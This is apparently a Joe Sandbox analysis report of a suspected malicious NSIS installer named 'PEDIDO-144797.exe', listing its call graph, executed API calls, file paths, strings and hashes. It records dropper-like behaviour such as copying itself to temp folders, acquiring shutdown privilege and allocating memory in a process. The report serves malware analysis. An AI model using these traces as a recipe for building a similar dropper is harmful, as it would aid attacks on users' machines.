5671->5663 5683 404ee7 5672->5683 5673 405335 5681 405347 ShowWindow GetDlgItem ShowWindow 5673->5681 5673->5695 5679 405160 5674->5679 5680 4051bf GlobalFree 5676->5680 5676->5688 5677->5676 5678 404fbc GetWindowLongW SetWindowLongW 5682 404fd5 5678->5682 5689 405171 SendMessageW 5679->5689 5680->5688 5681->5695 5684 404ff3 5682->5684 5685 404fdb ShowWindow 5682->5685 5683->5678 5687 404f37 SendMessageW 5683->5687 5690 404fb6 5683->5690 5692 404f73 SendMessageW 5683->5692 5693 404f84 SendMessageW 5683->5693 5704 40437a SendMessageW 5684->5704 5703 40437a SendMessageW 5685->5703 5687->5683 5688->5673 5694 404d5e 4 API calls 5688->5694 5699 405201 5688->5699 5689->5659 5690->5678 5690->5682 5692->5683 5693->5683 5694->5699 5695->5669 5696 40530b InvalidateRect 5696->5673 5697 405321 5696->5697 5705 404c99 5697->5705 5698 40522f SendMessageW 5702 405245 5698->5702 5699->5698 5699->5702 5701 4052b9 SendMessageW SendMessageW 5701->5702 5702->5696 5702->5701 5703->5695 5704->5661 5708 404bd0 5705->5708 5707 404cae 5707->5673 5709 404be9 5708->5709 5710 4063d2 17 API calls 5709->5710 5711 404c4d 5710->5711 5712 4063d2 17 API calls 5711->5712 5713 404c58 5712->5713 5714 4063d2 17 API calls 5713->5714 5715 404c6e lstrlenW wsprintfW SetDlgItemTextW 5714->5715 5715->5707 5716 401491 5717 405414 24 API calls 5716->5717 5718 401498 5717->5718 5719 402592 5720 4025c1 5719->5720 5721 4025a6 5719->5721 5723 4025f5 5720->5723 5724 4025c6 5720->5724 5722 402c15 17 API calls 5721->5722 5729 4025ad 5722->5729 5726 402c37 17 API calls 5723->5726 5725 402c37 17 API calls 5724->5725 5727 4025cd WideCharToMultiByte lstrlenA 5725->5727 5728 4025fc lstrlenW 5726->5728 5727->5729 5728->5729 5731 405f83 5 API calls 5729->5731 5732 40263f 5729->5732 5733 402629 5729->5733 5730 405f54 WriteFile 5730->5732 5731->5733 5733->5730 5733->5732 5734 404493 lstrlenW 5735 4044b2 5734->5735 5736 4044b4 WideCharToMultiByte 5734->5736 5735->5736 5737 404814 5738 404840 5737->5738 5739 404851 5737->5739 5798 4059f6 GetDlgItemTextW 5738->5798 5741 40485d GetDlgItem 5739->5741 5746 4048bc 5739->5746 5743 404871 5741->5743 5742 40484b 5745 406644 5 API calls 5742->5745 5749 404885 SetWindowTextW 5743->5749 5754 405d2c 4 API calls 5743->5754 5744 4049a0 5747 404b4f 5744->5747 5800 4059f6 GetDlgItemTextW 5744->5800 5745->5739 5746->5744 5746->5747 5751 4063d2 17 API calls 5746->5751 5753 4043ac 8 API calls 5747->5753 5752 404345 18 API calls 5749->5752 5750 4049d0 5755 405d89 18 API calls 5750->5755 5756 404930 SHBrowseForFolderW 5751->5756 5757 4048a1 5752->5757 5758 404b63 5753->5758 5759 40487b 5754->5759 5760 4049d6 5755->5760 5756->5744 5761 404948 CoTaskMemFree 5756->5761 5762 404345 18 API calls 5757->5762 5759->5749 5763 405c81 3 API calls 5759->5763 5801 4063b0 lstrcpynW 5760->5801 5764 405c81 3 API calls 5761->5764 5765 4048af 5762->5765 5763->5749 5766 404955 5764->5766 5799 40437a SendMessageW 5765->5799 5769 40498c SetDlgItemTextW 5766->5769 5774 4063d2 17 API calls 5766->5774 5769->5744 5770 4048b5 5772 40678a 5 API calls 5770->5772 5771 4049ed 5773 40678a 5 API calls 5771->5773 5772->5746 5781 4049f4 5773->5781 5775 404974 lstrcmpiW 5774->5775 5775->5769 5778 404985 lstrcatW 5775->5778 5776 404a35 5802 4063b0 lstrcpynW 5776->5802 5778->5769 5779 404a3c 5780 405d2c 4 API calls 5779->5780 5782 404a42 GetDiskFreeSpaceW 5780->5782 5781->5776 5784 405ccd 2 API calls 5781->5784 5786 404a8d 5781->5786 5785 404a66 MulDiv 5782->5785 5782->5786 5784->5781 5785->5786 5787 404afe 5786->5787 5788 404c99 20 API calls 5786->5788 5789 404b21 5787->5789 5790 40140b 2 API calls 5787->5790 5791 404aeb 5788->5791 5803 404367 EnableWindow 5789->5803 5790->5789 5793 404b00 SetDlgItemTextW 5791->5793 5794 404af0 5791->5794 5793->5787 5796 404bd0 20 API calls 5794->5796 5795 404b3d 5795->5747 5797 40476d SendMessageW 5795->5797 5796->5787 5797->5747 5798->5742 5799->5770 5800->5750 5801->5771 5802->5779 5803->5795 5804 10001058 5806 10001074 5804->5806 5805 100010dd 5806->5805 5807 10001516 GlobalFree 5806->5807 5808 10001092 5806->5808 5807->5808 5809 10001516 GlobalFree 5808->5809 5810 100010a2 5809->5810 5811 100010b2 5810->5811 5812 100010a9 GlobalSize 5810->5812 5813 100010b6 GlobalAlloc 5811->5813 5814 100010c7 5811->5814 5812->5811 5815 1000153d 3 API calls 5813->5815 5816 100010d2 GlobalFree 5814->5816 5815->5814 5816->5805 5817 401c19 5818 402c15 17 API calls 5817->5818 5819 401c20 5818->5819 5820 402c15 17 API calls 5819->5820 5821 401c2d 5820->5821 5822 402c37 17 API calls 5821->5822 5824 401c42 5821->5824 5822->5824 5823 401c52 5826 401ca9 5823->5826 5827 401c5d 5823->5827 5824->5823 5825 402c37 17 API calls 5824->5825 5825->5823 5828 402c37 17 API calls 5826->5828 5829 402c15 17 API calls 5827->5829 5830 401cae 5828->5830 5831 401c62 5829->5831 5832 402c37 17 API calls 5830->5832 5833 402c15 17 API calls 5831->5833 5834 401cb7 FindWindowExW 5832->5834 5835 401c6e 5833->5835 5838 401cd9 5834->5838 5836 401c99 SendMessageW 5835->5836 5837 401c7b SendMessageTimeoutW 5835->5837 5836->5838 5837->5838 5839 402a9a SendMessageW 5840 402ab4 InvalidateRect 5839->5840 5841 402abf 5839->5841 5840->5841 5842 40281b 5843 402821 5842->5843 5844 402829 FindClose 5843->5844 5845 402abf 5843->5845 5844->5845 5846 40149e 5847 4022f1 5846->5847 5848 4014ac PostQuitMessage 5846->5848 5848->5847 5856 100010e1 5859 10001111 5856->5859 5857 100011d8 GlobalFree 5858 100012ba 2 API calls 5858->5859 5859->5857 5859->5858 5860 100011d3 5859->5860 5861 10001272 2 API calls 5859->5861 5862 10001164 GlobalAlloc 5859->5862 5863 100011f8 GlobalFree 5859->5863 5864 100011c4 GlobalFree 5859->5864 5865 100012e1 lstrcpyW 5859->5865 5860->5857 5861->5864 5862->5859 5863->5859 5864->5859 5865->5859 5866 4029a2 5867 402c15 17 API calls 5866->5867 5868 4029a8 5867->5868 5869 4029e8 5868->5869 5870 4029cf 5868->5870 5877 402885 5868->5877 5872 402a02 5869->5872 5873 4029f2 5869->5873 5871 4029d4 5870->5871 5879 4029e5 5870->5879 5880 4063b0 lstrcpynW 5871->5880 5875 4063d2 17 API calls 5872->5875 5874 402c15 17 API calls 5873->5874 5874->5879 5875->5879 5879->5877 5881 4062f7 wsprintfW 5879->5881 5880->5877 5881->5877 4386 4015a3 4387 402c37 17 API calls 4386->4387 4388 4015aa SetFileAttributesW 4387->4388 4389 4015bc 4388->4389 5882 4028a7 5883 402c37 17 API calls 5882->5883 5884 4028b5 5883->5884 5885 4028cb 5884->5885 5886 402c37 17 API calls 5884->5886 5887 405e7d 2 API calls 5885->5887 5886->5885 5888 4028d1 5887->5888 5910 405ea2 GetFileAttributesW CreateFileW 5888->5910 5890 4028de 5891 402981 5890->5891 5892 4028ea GlobalAlloc 5890->5892 5895 402989 DeleteFileW 5891->5895 5896 40299c 5891->5896 5893 402903 5892->5893 5894 402978 CloseHandle 5892->5894 5911 403441 SetFilePointer 5893->5911 5894->5891 5895->5896 5898 402909 5899 40342b ReadFile 5898->5899 5900 402912 GlobalAlloc 5899->5900 5901 402922 5900->5901 5902 402956 5900->5902 5904 4031ba 44 API calls 5901->5904 5903 405f54 WriteFile 5902->5903 5905 402962 GlobalFree 5903->5905 5909 40292f 5904->5909 5906 4031ba 44 API calls 5905->5906 5907 402975 5906->5907 5907->5894 5908 40294d GlobalFree 5908->5902 5909->5908 5910->5890 5911->5898 4780 40202c 4781 4020f0 4780->4781 4782 40203e 4780->4782 4784 401423 24 API calls 4781->4784 4783 402c37 17 API calls 4782->4783 4785 402045 4783->4785 4791 40224a 4784->4791 4786 402c37 17 API calls 4785->4786 4787 40204e 4786->4787 4788 402064 LoadLibraryExW 4787->4788 4789 402056 GetModuleHandleW 4787->4789 4788->4781 4790 402075 4788->4790 4789->4788 4789->4790 4803 4067f9 WideCharToMultiByte 4790->4803 4794 402086 4797 4020a5 4794->4797 4798 40208e 4794->4798 4795 4020bf 4796 405414 24 API calls 4795->4796 4799 402096 4796->4799 4806 10001759 4797->4806 4800 401423 24 API calls 4798->4800 4799->4791 4801 4020e2 FreeLibrary 4799->4801 4800->4799 4801->4791 4804 406823 GetProcAddress 4803->4804 4805 402080 4803->4805 4804->4805 4805->4794 4805->4795 4807 10001789 4806->4807 4848 10001b18 4807->4848 4809 10001790 4810 100018a6 4809->4810 4811 100017a1 4809->4811 4812 100017a8 4809->4812 4810->4799 4896 10002286 4811->4896 4880 100022d0 4812->4880 4817 1000180c 4823 10001812 4817->4823 4824 1000184e 4817->4824 4818 100017ee 4909 100024a4 4818->4909 4819 100017d7 4833 100017cd 4819->4833 4906 10002b57 4819->4906 4820 100017be 4822 100017c4 4820->4822 4828 100017cf 4820->4828 4822->4833 4890 1000289c 4822->4890 4830 100015b4 3 API calls 4823->4830 4826 100024a4 10 API calls 4824->4826 4831 10001840 4826->4831 4827 100017f4 4920 100015b4 4827->4920 4900 10002640 4828->4900 4835 10001828 4830->4835 4847 10001895 4831->4847 4931 10002467 4831->4931 4833->4817 4833->4818 4838 100024a4 10 API calls 4835->4838 4837 100017d5 4837->4833 4838->4831 4840 1000189f GlobalFree 4840->4810 4844 10001881 4844->4847 4935 1000153d wsprintfW 4844->4935 4845 1000187a FreeLibrary 4845->4844 4847->4810 4847->4840 4938 1000121b GlobalAlloc 4848->4938 4850 10001b3c 4939 1000121b GlobalAlloc 4850->4939 4852 10001d7a GlobalFree GlobalFree GlobalFree 4853 10001d97 4852->4853 4859 10001de1 4852->4859 4855 10001dac 4853->4855 4856 100020ee 4853->4856 4853->4859 4854 10001b47 4854->4852 4857 10001c1d GlobalAlloc 4854->4857 4854->4859 4862 10001c68 lstrcpyW 4854->4862 4863 10001c86 GlobalFree 4854->4863 4865 10001c72 lstrcpyW 4854->4865 4870 10002048 4854->4870 4874 10001cc4 4854->4874 4875 10001f37 GlobalFree 4854->4875 4878 1000122c 2 API calls 4854->4878 4945 1000121b GlobalAlloc 4854->4945 4855->4859 4942 1000122c 4855->4942 4858 10002110 GetModuleHandleW 4856->4858 4856->4859 4857->4854 4860 10002121 LoadLibraryW 4858->4860 4861 10002136 4858->4861 4859->4809 4860->4859 4860->4861 4946 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4861->4946 4862->4865 4863->4854 4865->4854 4866 10002148 4867 10002188 4866->4867 4879 10002172 GetProcAddress 4866->4879 4867->4859 4868 10002195 lstrlenW 4867->4868 4947 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4868->4947 4870->4859 4873 10002090 lstrcpyW 4870->4873 4873->4859 4874->4854 4940 1000158f GlobalSize GlobalAlloc 4874->4940 4875->4854 4876 100021af 4876->4859 4878->4854 4879->4867 4887 100022e8 4880->4887 4881 1000122c GlobalAlloc lstrcpynW 4881->4887 4883 10002410 GlobalFree 4884 100017ae 4883->4884 4883->4887 4884->4819 4884->4820 4884->4833 4885 100023ba GlobalAlloc CLSIDFromString 4885->4883 4886 1000238f GlobalAlloc WideCharToMultiByte 4886->4883 4887->4881 4887->4883 4887->4885 4887->4886 4889 100023d9 4887->4889 4949 100012ba 4887->4949 4889->4883 4953 100025d4 4889->4953 4892 100028ae 4890->4892 4891 10002953 VirtualAllocEx 4893 10002971 4891->4893 4892->4891 4894 10002a62 GetLastError 4893->4894 4895 10002a6d 4893->4895 4894->4895 4895->4833 4897 10002296 4896->4897 4898 100017a7 4896->4898 4897->4898 4899 100022a8 GlobalAlloc 4897->4899 4898->4812 4899->4897 4904 1000265c 4900->4904 4901 100026c0 4903 100026c5 GlobalSize 4901->4903 4905 100026cf 4901->4905 4902 100026ad GlobalAlloc 4902->4905 4903->4905 4904->4901 4904->4902 4905->4837 4908 10002b62 4906->4908 4907 10002ba2 GlobalFree 4908->4907 4956 1000121b GlobalAlloc 4909->4956 4911 10002506 MultiByteToWideChar 4916 100024ae 4911->4916 4912 1000252b StringFromGUID2 4912->4916 4913 1000253c lstrcpynW 4913->4916 4914 1000256c GlobalFree 4914->4916 4915 1000254f wsprintfW 4915->4916 4916->4911 4916->4912 4916->4913 4916->4914 4916->4915 4917 100025a7 GlobalFree 4916->4917 4918 10001272 2 API calls 4916->4918 4957 100012e1 4916->4957 4917->4827 4918->4916 4961 1000121b GlobalAlloc 4920->4961 4922 100015ba 4923 100015c7 lstrcpyW 4922->4923 4925 100015e1 4922->4925 4926 100015fb 4923->4926 4925->4926 4927 100015e6 wsprintfW 4925->4927 4928 10001272 4926->4928 4927->4926 4929 100012b5 GlobalFree 4928->4929 4930 1000127b GlobalAlloc lstrcpynW 4928->4930 4929->4831 4930->4929 4932 10002475 4931->4932 4934 10001861 4931->4934 4933 10002491 GlobalFree 4932->4933 4932->4934 4933->4932 4934->4844 4934->4845 4936 10001272 2 API calls 4935->4936 4937 1000155e 4936->4937 4937->4847 4938->4850 4939->4854 4941 100015ad 4940->4941 4941->4874 4948 1000121b GlobalAlloc 4942->4948 4944 1000123b lstrcpynW 4944->4859 4945->4854 4946->4866 4947->4876 4948->4944 4950 100012c1 4949->4950 4951 1000122c 2 API calls 4950->4951 4952 100012df 4951->4952 4952->4887 4954 100025e2 VirtualAlloc 4953->4954 4955 10002638 4953->4955 4954->4955 4955->4889 4956->4916 4958 100012ea 4957->4958 4959 1000130c 4957->4959 4958->4959 4960 100012f0 lstrcpyW 4958->4960 4959->4916 4960->4959 4961->4922 5919 402a2f 5920 402c15 17 API calls 5919->5920 5921 402a35 5920->5921 5922 402a6c 5921->5922 5923 402885 5921->5923 5925 402a47 5921->5925 5922->5923 5924 4063d2 17 API calls 5922->5924 5924->5923 5925->5923 5927 4062f7 wsprintfW 5925->5927 5927->5923 5928 401a30 5929 402c37 17 API calls 5928->5929 5930 401a39 ExpandEnvironmentStringsW 5929->5930 5931 401a4d 5930->5931 5933 401a60 5930->5933 5932 401a52 lstrcmpW 5931->5932 5931->5933 5932->5933 5939 401db3 GetDC 5940 402c15 17 API calls 5939->5940 5941 401dc5 GetDeviceCaps MulDiv ReleaseDC 5940->5941 5942 402c15 17 API calls 5941->5942 5943 401df6 5942->5943 5944 4063d2 17 API calls 5943->5944 5945 401e33 CreateFontIndirectW 5944->5945 5946 40258c 5945->5946 5947 402835 5948 40283d 5947->5948 5949 402841 FindNextFileW 5948->5949 5950 402853 5948->5950 5949->5950 5951 4029e0 5950->5951 5953 4063b0 lstrcpynW 5950->5953 5953->5951 5954 401735 5955 402c37 17 API calls 5954->5955 5956 40173c SearchPathW 5955->5956 5957 4029e0 5956->5957 5958 401757 5956->5958 5958->5957 5960 4063b0 lstrcpynW 5958->5960 5960->5957 5961 10002a77 5962 10002a8f 5961->5962 5963 1000158f 2 API calls 5962->5963 5964 10002aaa 5963->5964 5965 4014b8 5966 4014be 5965->5966 5967 401389 2 API calls 5966->5967 5968 4014c6 5967->5968 5969 406aba 5973 40693e 5969->5973 5970 4072a9 5971 4069c8 GlobalAlloc 5971->5970 5971->5973 5972 4069bf GlobalFree 5972->5971 5973->5970 5973->5971 5973->5972 5974 406a36 GlobalFree 5973->5974 5975 406a3f GlobalAlloc 5973->5975 5974->5975 5975->5970 5975->5973

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00403489 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 412stringfilecomCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 8 4034d2 1->8 3 4034de-4034f2 call 40671a lstrlenA 2->3 9 4034f4-403510 call 40678a * 3 3->9 8->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 22 40351a 17->22 22->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 31 4035b4-4035b9 28->31 32 4035bb-4035bf 28->32 36 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->36 37 40372f-403749 DeleteFileW call 402f14 29->37 31->31 31->32 34 4035c1-4035c5 32->34 35 4035c6-4035ca 32->35 34->35 38 4035d0-4035d6 35->38 39 403689-403696 call 405cae 35->39 36->37 54 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 36->54 57 4037fa-40380a call 4039cc OleUninitialize 37->57 58 40374f-403755 37->58 43 4035f1-40362a 38->43 44 4035d8-4035e0 38->44 55 403698-403699 39->55 56 40369a-4036a0 39->56 45 403647-403681 43->45 46 40362c-403631 43->46 50 4035e2-4035e5 44->50 51 4035e7 44->51 45->39 53 403683-403687 45->53 46->45 52 403633-40363b 46->52 50->43 50->51 51->43 60 403642 52->60 61 40363d-403640 52->61 53->39 62 4036a8-4036b6 call 4063b0 53->62 54->37 54->57 55->56 56->28 64 4036a6 56->64 74 403930-403936 57->74 75 403810-403820 call 405a12 ExitProcess 57->75 65 4037ea-4037f1 call 403abe 58->65 66 40375b-403766 call 405cae 58->66 60->45 61->45 61->60 69 4036bb 62->69 64->69 73 4037f6 65->73 77 4037b4-4037be 66->77 78 403768-40379d 66->78 69->29 73->57 80 4039b4-4039bc 74->80 81 403938-40394e GetCurrentProcess OpenProcessToken 74->81 85 4037c0-4037ce call 405d89 77->85 86 403826-40383a call 40597d lstrcatW 77->86 82 40379f-4037a3 78->82 83 4039c2-4039c6 ExitProcess 80->83 84 4039be 80->84 88 403950-40397e LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403984-403992 call 40678a 81->89 90 4037a5-4037aa 82->90 91 4037ac-4037b0 82->91 84->83 85->57 99 4037d0-4037e6 call 4063b0 * 2 85->99 100 403847-403861 lstrcatW lstrcmpiW 86->100 101 40383c-403842 lstrcatW 86->101 88->89 102 4039a0-4039ab ExitWindowsEx 89->102 103 403994-40399e 89->103 90->91 95 4037b2 90->95 91->82 91->95 95->77 99->65 100->57 106 403863-403866 100->106 101->100 102->80 104 4039ad-4039af call 40140b 102->104 103->102 103->104 104->80 110 403868-40386d call 4058e3 106->110 111 40386f call 405960 106->111 115 403874-403882 SetCurrentDirectoryW 110->115 111->115 118 403884-40388a call 4063b0 115->118 119 40388f-4038b8 call 4063b0 115->119 118->119 123 4038bd-4038d9 call 4063d2 DeleteFileW 119->123 126 40391a-403922 123->126 127 4038db-4038eb CopyFileW 123->127 126->123 128 403924-40392b call 406176 126->128 127->126 129 4038ed-40390d call 406176 call 4063d2 call 405995 127->129 128->57 129->126 138 40390f-403916 CloseHandle 129->138 138->126
                                                                                                                                          APIs
                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004034AC
                                                                                                                                          • GetVersion.KERNEL32 ref: 004034B2
                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                                                                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403529
                                                                                                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                                                                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                                                                                                            • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                            • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                                                                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                                                                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403820
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                                                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\PEDIDO-144797.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
                                                                                                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                                                                                          • ExitProcess.KERNEL32 ref: 004039C6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144797.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                          • API String ID: 2488574733-2676631552
                                                                                                                                          • Opcode ID: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                          • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                                                                                          • Opcode Fuzzy Hash: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                          • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E
                                                                                                                                          Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
